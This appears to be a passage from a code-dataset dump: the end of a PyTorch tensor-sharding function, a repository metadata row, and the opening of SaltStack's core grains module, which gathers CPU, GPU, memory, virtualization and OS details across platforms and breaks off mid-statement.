sharding_dim_size = tensor.size(sharding_spec.dim) # type: ignore[arg-type]
split_size = get_split_size(sharding_dim_size, world_size)
tensor_sizes = list(tensor.size())
for idx, placement in enumerate(sharding_spec.placements):
chunked_dim_size = get_chunked_dim_size(sharding_dim_size, split_size, idx)
shard_size = copy.deepcopy(tensor_sizes)
shard_size[sharding_spec.dim] = chunked_dim_size # type: ignore[index]
shard_metadata = ShardMetadata(
shard_offsets=copy.deepcopy(current_offsets),
shard_sizes=shard_size,
placement=placement,
)
shards_metadata.append(shard_metadata)
if rank == placement.rank(): # type: ignore[union-attr]
local_metadata = shard_metadata
current_offsets[sharding_spec.dim] += chunked_dim_size # type: ignore[index]
# Scatter the shards (use broadcast since NCCL doesn't support scatter, this is very inefficient).
dist.broadcast(tensor, src=src_rank, group=pg)
# Reshape to get shard for this rank and we don't want autograd
# recording here for the narrow op and 'local_shard' should be a
# leaf variable in the autograd graph.
local_shard = tensor.narrow(
sharding_spec.dim, # type: ignore[arg-type]
local_metadata.shard_offsets[sharding_spec.dim], # type: ignore[union-attr, arg-type, index]
local_metadata.shard_sizes[sharding_spec.dim], # type: ignore[union-attr, index]
).clone().detach().contiguous()
# Sync requires_grad to local_shard.
local_shard.requires_grad = tensor.requires_grad
# Create ShardedTensor based on local shards.
local_shards = [
Shard(
tensor=local_shard,
metadata=local_metadata, # type: ignore[arg-type]
)
]
st = ShardedTensor._init_from_local_shards(local_shards, tensor.size(), process_group=pg)
# Manually set sharding_spec
st._sharding_spec = sharding_spec
# Replace param with ShardedTensor.
# Need to delete the attribute first since param_name might be
# torch.nn.Parameter and can't be replaced with ShardedTensor which is
# not torch.nn.Parameter.
delattr(module, param_name)
# Now we can set the attribute appropriately.
setattr(module, param_name, st)
| 40.308219 | 124 | 0.68904 |
93571401e2e7a9f8a753f6613b3c591fd880759f | 89,127 | py | Python | salt/grains/core.py | feth/salt | f4e610bb987d9529faca1f0ad1c339d3c4b3642b | [
"Apache-2.0"
] | null | null | null | salt/grains/core.py | feth/salt | f4e610bb987d9529faca1f0ad1c339d3c4b3642b | [
"Apache-2.0"
] | 1 | 2019-09-06T13:57:28.000Z | 2019-09-06T13:57:28.000Z | salt/grains/core.py | feth/salt | f4e610bb987d9529faca1f0ad1c339d3c4b3642b | [
"Apache-2.0"
] | 1 | 2020-09-30T16:09:48.000Z | 2020-09-30T16:09:48.000Z | # -*- coding: utf-8 -*-
'''
The static grains, these are the core, or built in grains.
When grains are loaded they are not loaded in the same way that modules are
loaded, grain functions are detected and executed, the functions MUST
return a dict which will be applied to the main grains dict. This module
will always be executed first, so that any grains loaded here in the core
module can be overwritten just by returning dict keys with the same value
as those returned here
'''
# Import python libs
from __future__ import absolute_import
import os
import json
import socket
import sys
import re
import platform
import logging
import locale
import uuid
import salt.exceptions
from salt.ext.six.moves import range
__proxyenabled__ = ['*']
__FQDN__ = None
# Extend the default list of supported distros. This will be used for the
# /etc/DISTRO-release checking that is part of platform.linux_distribution()
from platform import _supported_dists
_supported_dists += ('arch', 'mageia', 'meego', 'vmware', 'bluewhite64',
'slamd64', 'ovs', 'system', 'mint', 'oracle', 'void')
# Import salt libs
import salt.log
import salt.utils
import salt.utils.network
import salt.utils.dns
if salt.utils.is_windows():
import salt.utils.win_osinfo
# Solve the Chicken and egg problem where grains need to run before any
# of the modules are loaded and are generally available for any usage.
import salt.modules.cmdmod
import salt.modules.smbios
# Import 3rd-party libs
import salt.ext.six as six
__salt__ = {
'cmd.run': salt.modules.cmdmod._run_quiet,
'cmd.retcode': salt.modules.cmdmod._retcode_quiet,
'cmd.run_all': salt.modules.cmdmod._run_all_quiet,
'smbios.records': salt.modules.smbios.records,
'smbios.get': salt.modules.smbios.get,
}
log = logging.getLogger(__name__)
HAS_WMI = False
if salt.utils.is_windows():
# attempt to import the python wmi module
# the Windows minion uses WMI for some of its grains
try:
import wmi # pylint: disable=import-error
import salt.utils.winapi
import win32api
import salt.modules.reg
HAS_WMI = True
__salt__['reg.read_value'] = salt.modules.reg.read_value
except ImportError:
log.exception(
'Unable to import Python wmi module, some core grains '
'will be missing'
)
_INTERFACES = {}
def _windows_cpudata():
'''
Return some CPU information on Windows minions
'''
# Provides:
# num_cpus
# cpu_model
grains = {}
if 'NUMBER_OF_PROCESSORS' in os.environ:
# Cast to int so that the logic isn't broken when used as a
# conditional in templating. Also follows _linux_cpudata()
try:
grains['num_cpus'] = int(os.environ['NUMBER_OF_PROCESSORS'])
except ValueError:
grains['num_cpus'] = 1
grains['cpu_model'] = __salt__['reg.read_value'](
"HKEY_LOCAL_MACHINE",
"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",
"ProcessorNameString").get('vdata')
return grains
def _linux_cpudata():
'''
Return some CPU information for Linux minions
'''
# Provides:
# num_cpus
# cpu_model
# cpu_flags
grains = {}
cpuinfo = '/proc/cpuinfo'
# Parse over the cpuinfo file
if os.path.isfile(cpuinfo):
with salt.utils.fopen(cpuinfo, 'r') as _fp:
for line in _fp:
comps = line.split(':')
if not len(comps) > 1:
continue
key = comps[0].strip()
val = comps[1].strip()
if key == 'processor':
grains['num_cpus'] = int(val) + 1
elif key == 'model name':
grains['cpu_model'] = val
elif key == 'flags':
grains['cpu_flags'] = val.split()
elif key == 'Features':
grains['cpu_flags'] = val.split()
# ARM support - /proc/cpuinfo
#
# Processor : ARMv6-compatible processor rev 7 (v6l)
# BogoMIPS : 697.95
# Features : swp half thumb fastmult vfp edsp java tls
# CPU implementer : 0x41
# CPU architecture: 7
# CPU variant : 0x0
# CPU part : 0xb76
# CPU revision : 7
#
# Hardware : BCM2708
# Revision : 0002
# Serial : 00000000
elif key == 'Processor':
grains['cpu_model'] = val.split('-')[0]
grains['num_cpus'] = 1
if 'num_cpus' not in grains:
grains['num_cpus'] = 0
if 'cpu_model' not in grains:
grains['cpu_model'] = 'Unknown'
if 'cpu_flags' not in grains:
grains['cpu_flags'] = []
return grains
def _linux_gpu_data():
'''
num_gpus: int
gpus:
- vendor: nvidia|amd|ati|...
model: string
'''
if __opts__.get('enable_lspci', True) is False:
return {}
if __opts__.get('enable_gpu_grains', True) is False:
return {}
lspci = salt.utils.which('lspci')
if not lspci:
log.debug(
'The `lspci` binary is not available on the system. GPU grains '
'will not be available.'
)
return {}
# dominant gpu vendors to search for (MUST be lowercase for matching below)
known_vendors = ['nvidia', 'amd', 'ati', 'intel']
gpu_classes = ('vga compatible controller', '3d controller')
devs = []
try:
lspci_out = __salt__['cmd.run']('{0} -vmm'.format(lspci))
cur_dev = {}
error = False
# Add a blank element to the lspci_out.splitlines() list,
# otherwise the last device is not evaluated as a cur_dev and ignored.
lspci_list = lspci_out.splitlines()
lspci_list.append('')
for line in lspci_list:
# check for record-separating empty lines
if line == '':
if cur_dev.get('Class', '').lower() in gpu_classes:
devs.append(cur_dev)
cur_dev = {}
continue
if re.match(r'^\w+:\s+.*', line):
key, val = line.split(':', 1)
cur_dev[key.strip()] = val.strip()
else:
error = True
log.debug('Unexpected lspci output: \'{0}\''.format(line))
if error:
log.warning(
'Error loading grains, unexpected linux_gpu_data output, '
'check that you have a valid shell configured and '
'permissions to run lspci command'
)
except OSError:
pass
gpus = []
for gpu in devs:
vendor_strings = gpu['Vendor'].lower().split()
# default vendor to 'unknown', overwrite if we match a known one
vendor = 'unknown'
for name in known_vendors:
# search for an 'expected' vendor name in the list of strings
if name in vendor_strings:
vendor = name
break
gpus.append({'vendor': vendor, 'model': gpu['Device']})
grains = {}
grains['num_gpus'] = len(gpus)
grains['gpus'] = gpus
return grains
def _netbsd_gpu_data():
'''
num_gpus: int
gpus:
- vendor: nvidia|amd|ati|...
model: string
'''
known_vendors = ['nvidia', 'amd', 'ati', 'intel', 'cirrus logic', 'vmware']
gpus = []
try:
pcictl_out = __salt__['cmd.run']('pcictl pci0 list')
for line in pcictl_out.splitlines():
for vendor in known_vendors:
vendor_match = re.match(
r'[0-9:]+ ({0}) (.+) \(VGA .+\)'.format(vendor),
line,
re.IGNORECASE
)
if vendor_match:
gpus.append({'vendor': vendor_match.group(1), 'model': vendor_match.group(2)})
except OSError:
pass
grains = {}
grains['num_gpus'] = len(gpus)
grains['gpus'] = gpus
return grains
def _osx_gpudata():
'''
num_gpus: int
gpus:
- vendor: nvidia|amd|ati|...
model: string
'''
gpus = []
try:
pcictl_out = __salt__['cmd.run']('system_profiler SPDisplaysDataType')
for line in pcictl_out.splitlines():
fieldname, _, fieldval = line.partition(': ')
if fieldname.strip() == "Chipset Model":
vendor, _, model = fieldval.partition(' ')
vendor = vendor.lower()
gpus.append({'vendor': vendor, 'model': model})
except OSError:
pass
grains = {}
grains['num_gpus'] = len(gpus)
grains['gpus'] = gpus
return grains
def _bsd_cpudata(osdata):
'''
Return CPU information for BSD-like systems
'''
# Provides:
# cpuarch
# num_cpus
# cpu_model
# cpu_flags
sysctl = salt.utils.which('sysctl')
arch = salt.utils.which('arch')
cmds = {}
if sysctl:
cmds.update({
'num_cpus': '{0} -n hw.ncpu'.format(sysctl),
'cpuarch': '{0} -n hw.machine'.format(sysctl),
'cpu_model': '{0} -n hw.model'.format(sysctl),
})
if arch and osdata['kernel'] == 'OpenBSD':
cmds['cpuarch'] = '{0} -s'.format(arch)
if osdata['kernel'] == 'Darwin':
cmds['cpu_model'] = '{0} -n machdep.cpu.brand_string'.format(sysctl)
cmds['cpu_flags'] = '{0} -n machdep.cpu.features'.format(sysctl)
grains = dict([(k, __salt__['cmd.run'](v)) for k, v in six.iteritems(cmds)])
if 'cpu_flags' in grains and isinstance(grains['cpu_flags'], six.string_types):
grains['cpu_flags'] = grains['cpu_flags'].split(' ')
if osdata['kernel'] == 'NetBSD':
grains['cpu_flags'] = []
for line in __salt__['cmd.run']('cpuctl identify 0').splitlines():
cpu_match = re.match(r'cpu[0-9]:\ features[0-9]?\ .+<(.+)>', line)
if cpu_match:
flag = cpu_match.group(1).split(',')
grains['cpu_flags'].extend(flag)
if osdata['kernel'] == 'FreeBSD' and os.path.isfile('/var/run/dmesg.boot'):
grains['cpu_flags'] = []
# TODO: at least it needs to be tested for BSD other then FreeBSD
with salt.utils.fopen('/var/run/dmesg.boot', 'r') as _fp:
cpu_here = False
for line in _fp:
if line.startswith('CPU: '):
cpu_here = True # starts CPU descr
continue
if cpu_here:
if not line.startswith(' '):
break # game over
if 'Features' in line:
start = line.find('<')
end = line.find('>')
if start > 0 and end > 0:
flag = line[start + 1:end].split(',')
grains['cpu_flags'].extend(flag)
try:
grains['num_cpus'] = int(grains['num_cpus'])
except ValueError:
grains['num_cpus'] = 1
return grains
def _sunos_cpudata():
'''
Return the CPU information for Solaris-like systems
'''
# Provides:
# cpuarch
# num_cpus
# cpu_model
# cpu_flags
grains = {}
grains['cpu_flags'] = []
grains['cpuarch'] = __salt__['cmd.run']('isainfo -k')
psrinfo = '/usr/sbin/psrinfo 2>/dev/null'
grains['num_cpus'] = len(__salt__['cmd.run'](psrinfo, python_shell=True).splitlines())
kstat_info = 'kstat -p cpu_info:0:*:brand'
for line in __salt__['cmd.run'](kstat_info).splitlines():
match = re.match(r'(\w+:\d+:\w+\d+:\w+)\s+(.+)', line)
if match:
grains['cpu_model'] = match.group(2)
isainfo = 'isainfo -n -v'
for line in __salt__['cmd.run'](isainfo).splitlines():
match = re.match(r'^\s+(.+)', line)
if match:
cpu_flags = match.group(1).split()
grains['cpu_flags'].extend(cpu_flags)
return grains
def _memdata(osdata):
'''
Gather information about the system memory
'''
# Provides:
# mem_total
grains = {'mem_total': 0}
if osdata['kernel'] == 'Linux':
meminfo = '/proc/meminfo'
if os.path.isfile(meminfo):
with salt.utils.fopen(meminfo, 'r') as ifile:
for line in ifile:
comps = line.rstrip('\n').split(':')
if not len(comps) > 1:
continue
if comps[0].strip() == 'MemTotal':
# Use floor division to force output to be an integer
grains['mem_total'] = int(comps[1].split()[0]) // 1024
elif osdata['kernel'] in ('FreeBSD', 'OpenBSD', 'NetBSD', 'Darwin'):
sysctl = salt.utils.which('sysctl')
if sysctl:
if osdata['kernel'] == 'Darwin':
mem = __salt__['cmd.run']('{0} -n hw.memsize'.format(sysctl))
else:
mem = __salt__['cmd.run']('{0} -n hw.physmem'.format(sysctl))
if osdata['kernel'] == 'NetBSD' and mem.startswith('-'):
mem = __salt__['cmd.run']('{0} -n hw.physmem64'.format(sysctl))
grains['mem_total'] = int(mem) / 1024 / 1024
elif osdata['kernel'] == 'SunOS':
prtconf = '/usr/sbin/prtconf 2>/dev/null'
for line in __salt__['cmd.run'](prtconf, python_shell=True).splitlines():
comps = line.split(' ')
if comps[0].strip() == 'Memory' and comps[1].strip() == 'size:':
grains['mem_total'] = int(comps[2].strip())
elif osdata['kernel'] == 'Windows' and HAS_WMI:
# get the Total Physical memory as reported by msinfo32
tot_bytes = win32api.GlobalMemoryStatusEx()['TotalPhys']
# return memory info in gigabytes
grains['mem_total'] = int(tot_bytes / (1024 ** 2))
return grains
def _windows_virtual(osdata):
'''
Returns what type of virtual hardware is under the hood, kvm or physical
'''
# Provides:
# virtual
# virtual_subtype
grains = dict()
if osdata['kernel'] != 'Windows':
return grains
# It is possible that the 'manufacturer' and/or 'productname' grains
# exist but have a value of None.
manufacturer = osdata.get('manufacturer', '')
if manufacturer is None:
manufacturer = ''
productname = osdata.get('productname', '')
if productname is None:
productname = ''
if 'QEMU' in manufacturer:
# FIXME: Make this detect between kvm or qemu
grains['virtual'] = 'kvm'
if 'Bochs' in manufacturer:
grains['virtual'] = 'kvm'
# Product Name: (oVirt) www.ovirt.org
# Red Hat Community virtualization Project based on kvm
elif 'oVirt' in productname:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'oVirt'
# Red Hat Enterprise Virtualization
elif 'RHEV Hypervisor' in productname:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'rhev'
# Product Name: VirtualBox
elif 'VirtualBox' in productname:
grains['virtual'] = 'VirtualBox'
# Product Name: VMware Virtual Platform
elif 'VMware Virtual Platform' in productname:
grains['virtual'] = 'VMware'
# Manufacturer: Microsoft Corporation
# Product Name: Virtual Machine
elif 'Microsoft' in manufacturer and \
'Virtual Machine' in productname:
grains['virtual'] = 'VirtualPC'
# Manufacturer: Parallels Software International Inc.
elif 'Parallels Software' in manufacturer:
grains['virtual'] = 'Parallels'
# Apache CloudStack
elif 'CloudStack KVM Hypervisor' in productname:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'cloudstack'
return grains
def _virtual(osdata):
'''
Returns what type of virtual hardware is under the hood, kvm or physical
'''
# This is going to be a monster, if you are running a vm you can test this
# grain with please submit patches!
# Provides:
# virtual
# virtual_subtype
grains = {'virtual': 'physical'}
# Skip the below loop on platforms which have none of the desired cmds
# This is a temporary measure until we can write proper virtual hardware
# detection.
skip_cmds = ('AIX',)
# list of commands to be executed to determine the 'virtual' grain
_cmds = ['systemd-detect-virt', 'virt-what', 'dmidecode']
# test first for virt-what, which covers most of the desired functionality
# on most platforms
if not salt.utils.is_windows() and osdata['kernel'] not in skip_cmds:
if salt.utils.which('virt-what'):
_cmds = ['virt-what']
else:
log.debug(
'Please install \'virt-what\' to improve results of the '
'\'virtual\' grain.'
)
# Check if enable_lspci is True or False
if __opts__.get('enable_lspci', True) is False:
# /proc/bus/pci does not exists, lspci will fail
if os.path.exists('/proc/bus/pci'):
_cmds += ['lspci']
# Add additional last resort commands
if osdata['kernel'] in skip_cmds:
_cmds = ()
# Quick backout for BrandZ (Solaris LX Branded zones)
# Don't waste time trying other commands to detect the virtual grain
uname = salt.utils.which('uname')
if osdata['kernel'] == 'Linux' and uname:
ret = __salt__['cmd.run_all']('{0} -v'.format(uname))
if 'BrandZ' in ret['stdout']:
grains['virtual'] = 'zone'
grains.update(_mdata())
return grains
failed_commands = set()
for command in _cmds:
args = []
if osdata['kernel'] == 'Darwin':
command = 'system_profiler'
args = ['SPDisplaysDataType']
elif osdata['kernel'] == 'SunOS':
command = 'prtdiag'
args = []
cmd = salt.utils.which(command)
if not cmd:
continue
cmd = '{0} {1}'.format(cmd, ' '.join(args))
try:
ret = __salt__['cmd.run_all'](cmd)
if ret['retcode'] > 0:
if salt.log.is_logging_configured():
# systemd-detect-virt always returns > 0 on non-virtualized
# systems
# prtdiag only works in the global zone, skip if it fails
if salt.utils.is_windows() or 'systemd-detect-virt' in cmd or 'prtdiag' in cmd:
continue
failed_commands.add(command)
continue
except salt.exceptions.CommandExecutionError:
if salt.log.is_logging_configured():
if salt.utils.is_windows():
continue
failed_commands.add(command)
continue
output = ret['stdout']
if command == "system_profiler":
macoutput = output.lower()
if '0x1ab8' in macoutput:
grains['virtual'] = 'Parallels'
if 'parallels' in macoutput:
grains['virtual'] = 'Parallels'
if 'vmware' in macoutput:
grains['virtual'] = 'VMware'
if '0x15ad' in macoutput:
grains['virtual'] = 'VMware'
if 'virtualbox' in macoutput:
grains['virtual'] = 'VirtualBox'
# Break out of the loop so the next log message is not issued
break
elif command == 'systemd-detect-virt':
if output in ('qemu', 'kvm', 'oracle', 'xen', 'bochs', 'chroot', 'uml', 'systemd-nspawn'):
grains['virtual'] = output
break
elif 'vmware' in output:
grains['virtual'] = 'VMware'
break
elif 'microsoft' in output:
grains['virtual'] = 'VirtualPC'
break
elif 'lxc' in output:
grains['virtual'] = 'LXC'
break
elif 'systemd-nspawn' in output:
grains['virtual'] = 'LXC'
break
elif command == 'virt-what':
if output in ('kvm', 'qemu', 'uml', 'xen', 'lxc'):
grains['virtual'] = output
break
elif 'vmware' in output:
grains['virtual'] = 'VMware'
break
elif 'parallels' in output:
grains['virtual'] = 'Parallels'
break
elif 'hyperv' in output:
grains['virtual'] = 'HyperV'
break
elif command == 'dmidecode':
# Product Name: VirtualBox
if 'Vendor: QEMU' in output:
# FIXME: Make this detect between kvm or qemu
grains['virtual'] = 'kvm'
if 'Manufacturer: QEMU' in output:
grains['virtual'] = 'kvm'
if 'Vendor: Bochs' in output:
grains['virtual'] = 'kvm'
if 'Manufacturer: Bochs' in output:
grains['virtual'] = 'kvm'
if 'BHYVE' in output:
grains['virtual'] = 'bhyve'
# Product Name: (oVirt) www.ovirt.org
# Red Hat Community virtualization Project based on kvm
elif 'Manufacturer: oVirt' in output:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'ovirt'
# Red Hat Enterprise Virtualization
elif 'Product Name: RHEV Hypervisor' in output:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'rhev'
elif 'VirtualBox' in output:
grains['virtual'] = 'VirtualBox'
# Product Name: VMware Virtual Platform
elif 'VMware' in output:
grains['virtual'] = 'VMware'
# Manufacturer: Microsoft Corporation
# Product Name: Virtual Machine
elif ': Microsoft' in output and 'Virtual Machine' in output:
grains['virtual'] = 'VirtualPC'
# Manufacturer: Parallels Software International Inc.
elif 'Parallels Software' in output:
grains['virtual'] = 'Parallels'
elif 'Manufacturer: Google' in output:
grains['virtual'] = 'kvm'
# Proxmox KVM
elif 'Vendor: SeaBIOS' in output:
grains['virtual'] = 'kvm'
# Break out of the loop, lspci parsing is not necessary
break
elif command == 'lspci':
# dmidecode not available or the user does not have the necessary
# permissions
model = output.lower()
if 'vmware' in model:
grains['virtual'] = 'VMware'
# 00:04.0 System peripheral: InnoTek Systemberatung GmbH
# VirtualBox Guest Service
elif 'virtualbox' in model:
grains['virtual'] = 'VirtualBox'
elif 'qemu' in model:
grains['virtual'] = 'kvm'
elif 'virtio' in model:
grains['virtual'] = 'kvm'
# Break out of the loop so the next log message is not issued
break
elif command == 'virt-what':
# if 'virt-what' returns nothing, it's either an undetected platform
# so we default just as virt-what to 'physical', otherwise use the
# platform detected/returned by virt-what
if output:
grains['virtual'] = output.lower()
break
elif command == 'prtdiag':
model = output.lower().split("\n")[0]
if 'vmware' in model:
grains['virtual'] = 'VMware'
elif 'virtualbox' in model:
grains['virtual'] = 'VirtualBox'
elif 'qemu' in model:
grains['virtual'] = 'kvm'
elif 'joyent smartdc hvm' in model:
grains['virtual'] = 'kvm'
else:
if osdata['kernel'] in skip_cmds:
log.warning(
"The tools 'dmidecode' and 'lspci' failed to "
'execute because they do not exist on the system of the user '
'running this instance or the user does not have the '
'necessary permissions to execute them. Grains output might '
'not be accurate.'
)
choices = ('Linux', 'OpenBSD', 'HP-UX')
isdir = os.path.isdir
sysctl = salt.utils.which('sysctl')
if osdata['kernel'] in choices:
if os.path.isdir('/proc'):
try:
self_root = os.stat('/')
init_root = os.stat('/proc/1/root/.')
if self_root != init_root:
grains['virtual_subtype'] = 'chroot'
except (IOError, OSError):
pass
if os.path.isfile('/proc/1/cgroup'):
try:
with salt.utils.fopen('/proc/1/cgroup', 'r') as fhr:
if ':/lxc/' in fhr.read():
grains['virtual_subtype'] = 'LXC'
with salt.utils.fopen('/proc/1/cgroup', 'r') as fhr:
fhr_contents = fhr.read()
if ':/docker/' in fhr_contents or ':/system.slice/docker' in fhr_contents:
grains['virtual_subtype'] = 'Docker'
except IOError:
pass
if isdir('/proc/vz'):
if os.path.isfile('/proc/vz/version'):
grains['virtual'] = 'openvzhn'
elif os.path.isfile('/proc/vz/veinfo'):
grains['virtual'] = 'openvzve'
# a posteriori, it's expected for these to have failed:
failed_commands.discard('lspci')
failed_commands.discard('dmidecode')
# Provide additional detection for OpenVZ
if os.path.isfile('/proc/self/status'):
with salt.utils.fopen('/proc/self/status') as status_file:
vz_re = re.compile(r'^envID:\s+(\d+)$')
for line in status_file:
vz_match = vz_re.match(line.rstrip('\n'))
if vz_match and int(vz_match.groups()[0]) != 0:
grains['virtual'] = 'openvzve'
elif vz_match and int(vz_match.groups()[0]) == 0:
grains['virtual'] = 'openvzhn'
if isdir('/proc/sys/xen') or \
isdir('/sys/bus/xen') or isdir('/proc/xen'):
if os.path.isfile('/proc/xen/xsd_kva'):
# Tested on CentOS 5.3 / 2.6.18-194.26.1.el5xen
# Tested on CentOS 5.4 / 2.6.18-164.15.1.el5xen
grains['virtual_subtype'] = 'Xen Dom0'
else:
if grains.get('productname', '') == 'HVM domU':
# Requires dmidecode!
grains['virtual_subtype'] = 'Xen HVM DomU'
elif os.path.isfile('/proc/xen/capabilities') and \
os.access('/proc/xen/capabilities', os.R_OK):
with salt.utils.fopen('/proc/xen/capabilities') as fhr:
if 'control_d' not in fhr.read():
# Tested on CentOS 5.5 / 2.6.18-194.3.1.el5xen
grains['virtual_subtype'] = 'Xen PV DomU'
else:
# Shouldn't get to this, but just in case
grains['virtual_subtype'] = 'Xen Dom0'
# Tested on Fedora 10 / 2.6.27.30-170.2.82 with xen
# Tested on Fedora 15 / 2.6.41.4-1 without running xen
elif isdir('/sys/bus/xen'):
if 'xen:' in __salt__['cmd.run']('dmesg').lower():
grains['virtual_subtype'] = 'Xen PV DomU'
elif os.listdir('/sys/bus/xen/drivers'):
# An actual DomU will have several drivers
# whereas a paravirt ops kernel will not.
grains['virtual_subtype'] = 'Xen PV DomU'
# If a Dom0 or DomU was detected, obviously this is xen
if 'dom' in grains.get('virtual_subtype', '').lower():
grains['virtual'] = 'xen'
if os.path.isfile('/proc/cpuinfo'):
with salt.utils.fopen('/proc/cpuinfo', 'r') as fhr:
if 'QEMU Virtual CPU' in fhr.read():
grains['virtual'] = 'kvm'
if os.path.isfile('/sys/devices/virtual/dmi/id/product_name'):
try:
with salt.utils.fopen('/sys/devices/virtual/dmi/id/product_name', 'r') as fhr:
output = fhr.read()
if 'VirtualBox' in output:
grains['virtual'] = 'VirtualBox'
elif 'RHEV Hypervisor' in output:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'rhev'
elif 'oVirt Node' in output:
grains['virtual'] = 'kvm'
grains['virtual_subtype'] = 'ovirt'
elif 'Google' in output:
grains['virtual'] = 'gce'
except IOError:
pass
elif osdata['kernel'] == 'FreeBSD':
kenv = salt.utils.which('kenv')
if kenv:
product = __salt__['cmd.run'](
'{0} smbios.system.product'.format(kenv)
)
maker = __salt__['cmd.run'](
'{0} smbios.system.maker'.format(kenv)
)
if product.startswith('VMware'):
grains['virtual'] = 'VMware'
if product.startswith('VirtualBox'):
grains['virtual'] = 'VirtualBox'
if maker.startswith('Xen'):
grains['virtual_subtype'] = '{0} {1}'.format(maker, product)
grains['virtual'] = 'xen'
if maker.startswith('Microsoft') and product.startswith('Virtual'):
grains['virtual'] = 'VirtualPC'
if maker.startswith('OpenStack'):
grains['virtual'] = 'OpenStack'
if maker.startswith('Bochs'):
grains['virtual'] = 'kvm'
if sysctl:
hv_vendor = __salt__['cmd.run']('{0} hw.hv_vendor'.format(sysctl))
model = __salt__['cmd.run']('{0} hw.model'.format(sysctl))
jail = __salt__['cmd.run'](
'{0} -n security.jail.jailed'.format(sysctl)
)
if 'bhyve' in hv_vendor:
grains['virtual'] = 'bhyve'
if jail == '1':
grains['virtual_subtype'] = 'jail'
if 'QEMU Virtual CPU' in model:
grains['virtual'] = 'kvm'
elif osdata['kernel'] == 'SunOS':
# Check if it's a "regular" zone. (i.e. Solaris 10/11 zone)
zonename = salt.utils.which('zonename')
if zonename:
zone = __salt__['cmd.run']('{0}'.format(zonename))
if zone != 'global':
grains['virtual'] = 'zone'
if salt.utils.is_smartos_zone():
grains.update(_smartos_zone_data())
# Check if it's a branded zone (i.e. Solaris 8/9 zone)
if isdir('/.SUNWnative'):
grains['virtual'] = 'zone'
elif osdata['kernel'] == 'NetBSD':
if sysctl:
if 'QEMU Virtual CPU' in __salt__['cmd.run'](
'{0} -n machdep.cpu_brand'.format(sysctl)):
grains['virtual'] = 'kvm'
elif 'invalid' not in __salt__['cmd.run'](
'{0} -n machdep.xen.suspend'.format(sysctl)):
grains['virtual'] = 'Xen PV DomU'
elif 'VMware' in __salt__['cmd.run'](
'{0} -n machdep.dmi.system-vendor'.format(sysctl)):
grains['virtual'] = 'VMware'
# NetBSD has Xen dom0 support
elif __salt__['cmd.run'](
'{0} -n machdep.idle-mechanism'.format(sysctl)) == 'xen':
if os.path.isfile('/var/run/xenconsoled.pid'):
grains['virtual_subtype'] = 'Xen Dom0'
for command in failed_commands:
log.warning(
"Although '{0}' was found in path, the current user "
'cannot execute it. Grains output might not be '
'accurate.'.format(command)
)
return grains
def _ps(osdata):
'''
Return the ps grain
'''
grains = {}
bsd_choices = ('FreeBSD', 'NetBSD', 'OpenBSD', 'MacOS')
if osdata['os'] in bsd_choices:
grains['ps'] = 'ps auxwww'
elif osdata['os_family'] == 'Solaris':
grains['ps'] = '/usr/ucb/ps auxwww'
elif osdata['os'] == 'Windows':
grains['ps'] = 'tasklist.exe'
elif osdata.get('virtual', '') == 'openvzhn':
grains['ps'] = (
'ps -fH -p $(grep -l \"^envID:[[:space:]]*0\\$\" '
'/proc/[0-9]*/status | sed -e \"s=/proc/\\([0-9]*\\)/.*=\\1=\") '
'| awk \'{ $7=\"\"; print }\''
)
else:
grains['ps'] = 'ps -efHww'
return grains
def _clean_value(key, val):
'''
Clean out well-known bogus values.
If it isn't clean (for example has value 'None'), return None.
Otherwise, return the original value.
NOTE: This logic also exists in the smbios module. This function is
for use when not using smbios to retrieve the value.
'''
if (val is None or
not len(val) or
re.match('none', val, flags=re.IGNORECASE)):
return None
elif 'uuid' in key:
# Try each version (1-5) of RFC4122 to check if it's actually a UUID
for uuidver in range(1, 5):
try:
uuid.UUID(val, version=uuidver)
return val
except ValueError:
continue
log.trace('HW {0} value {1} is an invalid UUID'.format(key, val.replace('\n', ' ')))
return None
elif re.search('serial|part|version', key):
# 'To be filled by O.E.M.
# 'Not applicable' etc.
# 'Not specified' etc.
# 0000000, 1234567 etc.
# begone!
if (re.match(r'^[0]+$', val) or
re.match(r'[0]?1234567[8]?[9]?[0]?', val) or
re.search(r'sernum|part[_-]?number|specified|filled|applicable', val, flags=re.IGNORECASE)):
return None
elif re.search('asset|manufacturer', key):
# AssetTag0. Manufacturer04. Begone.
if re.search(r'manufacturer|to be filled|available|asset|^no(ne|t)', val, flags=re.IGNORECASE):
return None
else:
# map unspecified, undefined, unknown & whatever to None
if (re.search(r'to be filled', val, flags=re.IGNORECASE) or
re.search(r'un(known|specified)|no(t|ne)? (asset|provided|defined|available|present|specified)',
val, flags=re.IGNORECASE)):
return None
return val
def _windows_platform_data():
'''
Use the platform module for as much as we can.
'''
# Provides:
# kernelrelease
# osversion
# osrelease
# osservicepack
# osmanufacturer
# manufacturer
# productname
# biosversion
# serialnumber
# osfullname
# timezone
# windowsdomain
# motherboard.productname
# motherboard.serialnumber
# virtual
if not HAS_WMI:
return {}
with salt.utils.winapi.Com():
wmi_c = wmi.WMI()
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa394102%28v=vs.85%29.aspx
systeminfo = wmi_c.Win32_ComputerSystem()[0]
# https://msdn.microsoft.com/en-us/library/aa394239(v=vs.85).aspx
osinfo = wmi_c.Win32_OperatingSystem()[0]
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa394077(v=vs.85).aspx
biosinfo = wmi_c.Win32_BIOS()[0]
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa394498(v=vs.85).aspx
timeinfo = wmi_c.Win32_TimeZone()[0]
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa394072(v=vs.85).aspx
motherboard = {'product': None,
'serial': None}
try:
motherboardinfo = wmi_c.Win32_BaseBoard()[0]
motherboard['product'] = motherboardinfo.Product
motherboard['serial'] = motherboardinfo.SerialNumber
except IndexError:
log.debug('Motherboard info not available on this system')
os_release = platform.release()
info = salt.utils.win_osinfo.get_os_version_info()
# Starting with Python 2.7.12 and 3.5.2 the `platform.uname()` function
# started reporting the Desktop version instead of the Server version on
# Server versions of Windows, so we need to look those up
# Check for Python >=2.7.12 or >=3.5.2
ver = pythonversion()['pythonversion']
if ((six.PY2 and
salt.utils.compare_versions(ver, '>=', [2, 7, 12, 'final', 0]))
or
